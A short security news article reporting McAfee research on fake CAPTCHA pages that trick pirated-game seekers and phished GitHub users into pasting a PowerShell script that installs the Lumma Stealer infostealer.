Fake CAPTCHA Targets Users Seeking Pirated Games and GitHub Repositories
A fake CAPTCHA test is targeting gamers looking to download pirated PC games, according to research from McAfee.
McAfee researchers say the fake CAPTCHAs pop-ups appear on dubious websites that falsely claim to provide access to cracked or pirated PC games, such as Hogwarts Legacy. The second target group is GitHub contributors who are being sent phishing emails pretending to come from Github that prompt them to resolve a fake “security vulnerability.” These emails include links directing them to the same fake CAPTCHA pages.
“When users search the internet for free or cracked versions of popular video games, they may encounter online forums, community posts, or public repositories that redirect them to malicious links,” McAfee said.
Once on the site, users are asked to complete what looks like a CAPTCHA test meant to verify their identity as human visitors. In reality, this fake CAPTCHA is a tactic to trick users into installing the Lumma Stealer malware.
The fake CAPTCHA asks users to click on “Verify you are a human” or “I am not a robot” buttons, which copies a malicious script to the clipboard. It then prompts them to press “Windows + R” to open the run dialog box, and finally, it instructs them to press “CTRL + V” and hit enter, which essentially pastes a PowerShell script into the run dialog.
The infostealing malware installed on your PC targets victims’ account credentials, passwords, and even crypto wallets.
If you’re thinking this doesn’t resemble a typical CAPTCHA, you’re correct. That said, these tests are evolving, so it’s getting harder to identify the real from the fake ones.
“The ClickFix infection chain demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer,” McAfee says. “By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.”
React to this headline: